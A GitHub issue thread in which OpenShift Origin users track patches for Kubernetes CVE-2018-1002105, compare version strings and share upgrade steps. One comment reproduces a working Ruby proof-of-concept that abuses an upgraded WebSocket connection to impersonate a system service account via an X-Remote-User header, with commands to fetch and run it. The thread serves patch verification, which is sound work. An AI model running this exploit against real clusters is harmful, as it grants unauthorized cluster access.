openshift / origin

Conformance test suite for OpenShift
http://www.openshift.org
Apache License 2.0
8.46k stars 4.69k forks source link

CVE-2018-1002105 #21606

Closed clcollins closed 4 years ago

clcollins commented 5 years ago

It appears that Kubernetes has patched v1.10.11, v1.11.5, and v1.12.3 for CVE-2018-1002105, the pod exec/attach/port-forward attack and API Extension attack(s) that were released yesterday(?). Downstream OCP has either a patch or mitigation available. I don't see any mention of the CVE in Origin in either the issues or commits yet (apologies if I'm missing something).

Is there a tracker for watching patches as applied to Origin, and when they are, can they immediately be applied using the documented upgrade process using OpenShift Ansible? Or are there changes needed there as well?

Thanks!

Edit: FWIW, we're running v3.11

mshutt commented 5 years ago

It kind of looks like a new openshift/origin-control-plane:v3.10.0 was released last night. I also saw this in the git log of the release-3.10 branch:

commit 8a7096453e33bb8992c6d3c3c90116a8088902b0
Merge: 6b8ad0e482 95d325e75e
Author: OpenShift Merge Robot <openshift-merge-robot@users.noreply.github.com>
Date:   Mon Dec 3 16:20:34 2018 -0800

    Merge pull request #21601 from deads2k/cve-23-ok-3.10

    UPSTREAM: 00000: Verify backend upgrade

I'd love to hear from the devs tho

mshutt commented 5 years ago

Does anyone have a Proof of Concept or test harness of sorts short of checking the container version besides read the exploit and figure out how all of this port handing goes?

mshutt commented 5 years ago

So 4 hrs in and not a word? I know these bits are "free as in beer", but it's still important that the people drinking the free beer aren't drinking poison... If I didn't know any better, I'd think that the lack of messaging was by design?

Send my regards to whoever my Solutions Architect is now that he's a chief architect as we are/were so close to at least getting pricing... But this... C'mon.

Is the origin-control-plane:v3.10.0 pushed to docker hub last night free of this CVE or nawh?

jocelynthode commented 5 years ago

I would also like to know if the fix will be back ported to 3.6?

mshutt commented 5 years ago

Ok well in terms of 3.10, the binaries in the origin-control-plane:v3.10.0 container both have a symbol for proxy.getResponseCode and have a version string which includes the first 8 chars of @deads2k last PR merge.

# oc -n kube-system rsh master-api-[redacted]
sh-4.2# nm openshift | egrep getResponseCode
00000000014b79b0 t github.com/openshift/origin/vendor/k8s.io/apimachinery/pkg/util/proxy.getResponseCode
sh-4.2# ./openshift version
openshift v3.10.0+8a70964-87

https://github.com/deads2k/origin/blob/95d325e75e35a477ab416a4eefc0182579705ec5/vendor/k8s.io/kubernetes/staging/src/k8s.io/apimachinery/pkg/util/proxy/upgradeaware.go#L374

func getResponseCode(r io.Reader) (int, []byte, error) { - this method was added witth the patch

commit 8a7096453e33bb8992c6d3c3c90116a8088902b0 (HEAD -> release-3.10, origin/release-3.10)
Merge: 6b8ad0e482 95d325e75e
Author: OpenShift Merge Robot <openshift-merge-robot@users.noreply.github.com>
Date:   Mon Dec 3 16:20:34 2018 -0800

    Merge pull request #21601 from deads2k/cve-23-ok-3.10

    UPSTREAM: 00000: Verify backend upgrade
mshutt commented 5 years ago

Ok all my whining and we got through rolling 3.10.0 (redux) into the control plane no problem...

Lukasz-Sagittarius-Strzelec commented 5 years ago

Some question ?
This backport mitigating the API Extension attack (OCP 3.6 -> 3.11) ? What about the pod exec/attach/port-forward attack (OCP 3.2->3.11) ? What about 3.9. version - can we expect updates here as well ? How this one was solved ?

Thanks in advance

rhnewtron commented 5 years ago

Generally speaking, there is no confirmation that the fix from above is actually a fix for this issue. Maybe a developer could approve that this is fixed with this commit and that the latest docker images (from which date on) contain this fix.

Lazast commented 5 years ago

Any progress?

mirekphd commented 5 years ago

You can test for the presence of this vulnerability in the latest build of OKD using this container from Gravitational (the gravitational/cve-2018-1002105:latest image is hosted on Quay, and itself shows no vulnerabilities): https://github.com/gravitational/cve-2018-1002105

gfvirga commented 5 years ago

I am on the lastest v3.11 and I am getting: [root@baleia cve-2018-1002105]# go run main.go Attempting to locate and load kubeconfig file Loading: /root/.kube/config Testing for unauthenticated access...

API allows unauthenticated access Testing for privilege escalation... API is vulnerable to CVE-2018-1002105

Lukasz-Sagittarius-Strzelec commented 5 years ago

@gfvirga I have the same issue. I'm using v3.9.0 with mitigation applied and have he same output. When you look on the code, in the first step it's testing simply https:///apis - but thing is that this shows valid answer (almost always). Listed endpoints are not available to not authenticated user. The same goes to pod test :( I guess first test is not really good one, second one can't be treated as trusted one.

Or.... I simply doing something wrong :)

mshutt commented 5 years ago

You can't hit the loadbalancer. It caught me at first, but I saw in the README.md that is a problem. I find it best to create a new kubeconfig and feed it into the container or pass it to the go app.

You also need list pods in all namespaces as well as list all namespaces as that is the discovery process of this app... IOW create a clusterrole (and clusterrolebinding):

# oc get clusterroles/listns -o yaml
apiVersion: authorization.openshift.io/v1
kind: ClusterRole
metadata:
  name: listns
rules:
- apiGroups:
  - ""
  attributeRestrictions: null
  resources:
  - namespaces
  - pods
  verbs:
  - get
  - list
mirekphd commented 5 years ago

I found a simple test (exploit) described in this blog by Ariel Zalivansky (the author used Ubuntu, but you can port it easily to Centos/RHEL):

apt-get update && apt-get install -y ruby git
git clone https://gist.github.com/2d09ec0ad600667980359394a2a65a0d.git
cd 2d09ec0ad600667980359394a2a65a0d/ 
chmod +x poc.rb
./poc.rb

Note that before executing the Ruby script in the final line you will probably need to modify the 'host = 'kubernetes'` variable in your local copy of poc.rb.

For posterity, poc.rb contains the following code:

#!/usr/bin/env ruby

require 'socket'
require 'openssl'
require 'json'

host = 'kubernetes'
metrics = '/apis/metrics.k8s.io/v1beta1'

sock = TCPSocket.new host, 443
ssl = OpenSSL::SSL::SSLSocket.new sock
ssl.sync_close = true
ssl.connect

ssl.puts "GET #{metrics} HTTP/1.1\r\nHost: #{host}\r\nUpgrade: WebSocket\r\nConnection: upgrade\r\n\r\n"
6.times { puts ssl.gets }
ssl.puts "GET #{metrics}/pods HTTP/1.1\r\nHost: #{host}\r\nX-Remote-User: system:serviceaccount:kube-system:horizontal-pod-autoscaler\r\n\r\n"
6.times { puts ssl.gets }

puts JSON.pretty_generate JSON.parse ssl.gets

ssl.close
rhnewtron commented 5 years ago

Actually I tested this procedure manually and I was able to exploit the CVE if both pods run on the same node. I tried the same on 3.11 (installed 60 minutes ago) and it seems to be not exploitable.

skynardo commented 5 years ago

Ok all my whining and we got through rolling 3.10.0 (redux) into the control plane no problem...

We upgraded one of our environments from 3.9 to 3.10 4 days ago and appear to have the patched version sh-4.2# openshift version openshift v3.10.0+8a70964-87

We previously upgraded another envionment (12 days ago) and as expected it has the not-yet-patched version of 3.10 sh-4.2# openshift version openshift v3.10.0+9e57eff-83

However, when re-running the /usr/share/ansible/openshift-ansible/playbooks/byo/openshift-cluster/upgrades/v3_10/upgrade.yml on this environment, it does not upgrade it. The control plane binaries remain at openshift v3.10.0+9e57eff-83 ?

@mshutt How did you update your existing 3.10 environment?

mshutt commented 5 years ago

Howdy @skynardo. I just wrote a playbook that does a docker pull... and if changed, it does the /usr/local/bin/restart-masters (or something like that) for both the api and controller... and it has a serial of 1 and a delay period between iterations.

On Mon, Dec 10, 2018 at 3:27 PM skynardo notifications@github.com wrote:

Ok all my whining and we got through rolling 3.10.0 (redux) into the control plane no problem...

We upgraded one of our environments from 3.9 to 3.10 4 days ago and appear to have the patched version sh-4.2# openshift version openshift v3.10.0+8a70964-87

We previously upgraded another envionment (12 days ago) and as expected it has the not-yet-patched version of 3.10 sh-4.2# openshift version openshift v3.10.0+9e57eff-83

However, when re-running the /usr/share/ansible/openshift-ansible/playbooks/byo/openshift-cluster/upgrades/v3_10/upgrade.yml on this environment, it does not upgrade it. The control plane binaries remain at openshift v3.10.0+9e57eff-83 ?

@mshutt https://github.com/mshutt How did you update your existing 3.10 environment?

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/openshift/origin/issues/21606#issuecomment-445960289, or mute the thread https://github.com/notifications/unsubscribe-auth/AiRB9txv9OITGM-Dilj5M7j2EUUA3g_9ks5u3sOYgaJpZM4ZApNK .

skynardo commented 5 years ago

Thanks, will give that a go.

edusouzaxx commented 5 years ago

I use version 3.7. Will it be a patch available for this version?

morodin commented 5 years ago

@mshutt Would it be possible to share that playbook?

skynardo commented 5 years ago

@morodin , I can share the commands I ran remotely from our Ansible server using shell module: ansible masters[0] -m shell -a "docker pull docker.io/openshift/origin-control-plane:v3.10" ansible masters[0] -m shell -a "/usr/local/bin/master-restart api" ansible masters[0] -m shell -a "/usr/local/bin/master-restart controllers"

mshutt commented 5 years ago

That only gets one master but....

On Thu, Dec 13, 2018, 5:49 AM skynardo <notifications@github.com wrote:

@mshutt https://github.com/mshutt, I can share the commands I ran remotely from our Ansible server using shell module: ansible masters[0] -m shell -a "docker pull docker.io/openshift/origin-control-plane:v3.10" ansible masters[0] -m shell -a "/usr/local/bin/master-restart api" ansible masters[0] -m shell -a "/usr/local/bin/master-restart controllers"

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/openshift/origin/issues/21606#issuecomment-446974567, or mute the thread https://github.com/notifications/unsubscribe-auth/AiRB9o_2jH27p1HMw2MST2xQMLKVkR9Tks5u4lr1gaJpZM4ZApNK .

mshutt commented 5 years ago

And I'm not sure that's right... We used v3.10.0

On Thu, Dec 13, 2018, 5:49 AM skynardo <notifications@github.com wrote:

@mshutt https://github.com/mshutt, I can share the commands I ran remotely from our Ansible server using shell module: ansible masters[0] -m shell -a "docker pull docker.io/openshift/origin-control-plane:v3.10" ansible masters[0] -m shell -a "/usr/local/bin/master-restart api" ansible masters[0] -m shell -a "/usr/local/bin/master-restart controllers"

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/openshift/origin/issues/21606#issuecomment-446974567, or mute the thread https://github.com/notifications/unsubscribe-auth/AiRB9o_2jH27p1HMw2MST2xQMLKVkR9Tks5u4lr1gaJpZM4ZApNK .

morodin commented 5 years ago

Thanks for that, it might be easier than running the upgrade playbook (which seem to work in our case) .

clcollins commented 5 years ago

@morodin - we ran the upgrade playbook too. I still had to manually pull the new images for some reason.

We also ran into issues with the origin-node container stopping but not being removed, so the systemd origin-node.service would not start, and I had to delete the container with runc to get it to continue. Did you run into either of those issues?

morodin commented 5 years ago

@clcollins No, our upgrade run through without issues, pulling Version "v3.10.0+8a70964-87", which should be the patched one.

skynardo commented 5 years ago

@clcollins when you say origin-node container are you referring to the sync pods in the openshift-node project? I see that these pods are still running openshift v3.10.0+9e57eff-83 in our environment that was upgraded to 3.10 prior to the fix. @mshutt, thanks for the correction on v3.10.0

morodin commented 5 years ago

@skynardo That was clcollins given that Statement.

skynardo commented 5 years ago

@morodin, are you saying that you had an existing 3.10 environment that was NOT at v3.10.0+8a70964-87, and you ran the upgrade playbook again and it deployed the patched version ? (v3.10.0+8a70964-87). I have not been able to make that work. Might try newer playbooks today.

morodin commented 5 years ago

@skynardo Yes, that is exactly what I did. Just using the 3.10 upgrade playbook from the centos openshift-ansible package.

clcollins commented 5 years ago

@skynardo: Not the sync node, but the origin-node container being run by the systemd origin-node service with runc, from /etc/systemd/system/origin-node.service.

# runc list
ID              PID         STATUS      BUNDLE                                       CREATED                          OWNER
origin-node     29457       running     /var/lib/containers/atomic/origin-node.0     2018-12-12T15:06:09.801904732Z   root

I think the sync node from the sync daemonset is running via Docker.

docker ps |grep sync
042835e362c3        8546ec1d6700          "/bin/bash -c '#!/..."   2 days ago          Up 2 days 

That's not the one that failed to be removed.

ferryvanmaurik commented 5 years ago

Does this patch for 3.7 also work with okd? https://access.redhat.com/errata/RHSA-2018:2906

skynardo commented 5 years ago

@clcollins, I don't have runc installed on my masters/nodes. Are you running containerized install maybe?
I did try to run the latest version of the 3.10 playbooks and they fail when trying to restart node service on master[0]. We are running origin 3.10 on AWS EC2 using advanced install method, upgraded from 3.9 cluster.

systemctl status origin-node ● origin-node.service - OpenShift Node Loaded: loaded (/etc/systemd/system/origin-node.service; enabled; vendor preset: disabled) Active: active (running) since Thu 2018-12-20 12:02:43 UTC; 8h ago Docs: https://github.com/openshift/origin Main PID: 3712 (hyperkube) Memory: 67.9M CGroup: /system.slice/origin-node.service ...

clcollins commented 5 years ago

@skynardo: Ah, yes, sorry - we are using the containerized install on Atomic hosts. We're using 3.11, with on-prem virtual machines.

mirekphd commented 5 years ago

If you need an unofficial confirmation that CVE-2018-1002105 was patched in OKD (master branch head) on Nov 08, just compare the openshift/origin patch in the upgradeaware.go with kubernetes/kubernetes original patch - they are identical.

Patch to Kubernetes' upgradeaware.go: Verify backend upgraded connection

Patch to OKD's upgradeaware.go: (just click Load Diff) UPSTREAM: 00000: Verify backend upgrade

The patched file is here. This issue should remain open until we get a release incorporating the patch. Most likely there will be no backports to older versions...

mshutt commented 5 years ago

@mirekphd I'd personally leave it open in protest. The CVE was so heinous that free as in beer vs. free as in speech ought not even be a matter for discussion.

That said it is patched clear back into at least the 3.9 release branch, I believe. Bins (containers) were stealth cut for at least 3.10 and I presume other releases

der-ali commented 5 years ago

i am running okd 3.9 with advanced installation. I am not really sure how to patch it. Any Idea ?

smarterclayton commented 5 years ago

This went out back to 3.9 when the embargo was released, and rolling images and rpms were built at that time (with the centos PaaS sig releasing new rpms).

There was a discussion on the mailing list about why the rolling releases model is used, but it effectively allows us to ensure new clusters and new nodes are always at latest. It does mean that you need to run an upgrade or pull latest images on control plane nodes, but that’s always been the case.

smarterclayton commented 5 years ago

https://lists.openshift.redhat.com/openshift-archives/dev/2018-December/msg00014.html

I think I was wrong in this, it looks like David did backport it would have been in the rpms published to gcs and the rolling images.

jocelynthode commented 5 years ago

@smarterclayton hey, thanks for the answer. However I see that the Paas sig repos still have no updates which leave a lot of openshift origin users in a vulnerable state.

From what I read on the mailing list they need to have a tag on git to be able to build a new version. Could you please either create a v3.11.1 tag or recreate the v3.11 so that Paas could rebuild the rpms with the patch?

smarterclayton commented 5 years ago

@DanyC97 can you describe why you need a tag to rebuild? Can't you just generate a patch level build by refreshing the source tar?

jocelynthode commented 5 years ago

@smarterclayton re-reading the mailing list just now he asked for a release, I assumed @DanyC97 meant git tag but maybe it is a github release? For clarity here is the quote :

the fix to make it into 3.11/3.10 Origin branches => done [1] however i am just guessing those are the right PRs, someone from RH will need to confirm/ refute a new Origin release to be cut for 3.11/3.10 then i can start with the PaaS Sig work

zoobab commented 5 years ago

Is it fixed or not in Origin?

leoluk commented 5 years ago

It's mostly fixed.

The PRs were backported to the 3.10 and 3.11 branches and the Docker containers were rebuilt: https://hub.docker.com/r/openshift/origin-control-plane/tags

However, the CentOS PaaS release repos were NOT rebuilt, so if you run a non-containerized deployment with the master deployed from RPMs, you're still vulnerable, and you should upgrade to 3.11, which runs the master services via static kubelet pods.

okd/origin is a community effort, particularly the binary builds, and if you run it in production, I would highly recommend to familiarize yourself with the release and backporting process on GitHub to that you can see for yourself which fixes got backported. Support for older releases can be hit-and-miss.

If you want actionable security bulletins and dependable long-term support, a Red Hat subscription would be your best bet. Like any community project, OKD is more of a DIY solution (though very close to upstream).

openshift-bot commented 4 years ago

Issues go stale after 90d of inactivity.

Mark the issue as fresh by commenting /remove-lifecycle stale. Stale issues rot after an additional 30d of inactivity and eventually close. Exclude this issue from closing by commenting /lifecycle frozen.

If this issue is safe to close now please do so with /close.

/lifecycle stale

openshift-bot commented 4 years ago

Stale issues rot after 30d of inactivity.

Mark the issue as fresh by commenting /remove-lifecycle rotten. Rotten issues close after an additional 30d of inactivity. Exclude this issue from closing by commenting /lifecycle frozen.

If this issue is safe to close now please do so with /close.

/lifecycle rotten /remove-lifecycle stale

openshift-bot commented 4 years ago

Rotten issues close after 30d of inactivity.

Reopen the issue by commenting /reopen. Mark the issue as fresh by commenting /remove-lifecycle rotten. Exclude this issue from closing again by commenting /lifecycle frozen.

/close

openshift-ci-robot commented 4 years ago

@openshift-bot: Closing this issue.

In response to [this](https://github.com/openshift/origin/issues/21606#issuecomment-540174272): >Rotten issues close after 30d of inactivity. > >Reopen the issue by commenting `/reopen`. >Mark the issue as fresh by commenting `/remove-lifecycle rotten`. >Exclude this issue from closing again by commenting `/lifecycle frozen`. > >/close Instructions for interacting with me using PR comments are available [here](https://git.k8s.io/community/contributors/guide/pull-requests.md). If you have questions or suggestions related to my behavior, please file an issue against the [kubernetes/test-infra](https://github.com/kubernetes/test-infra/issues/new?title=Prow%20issue:) repository.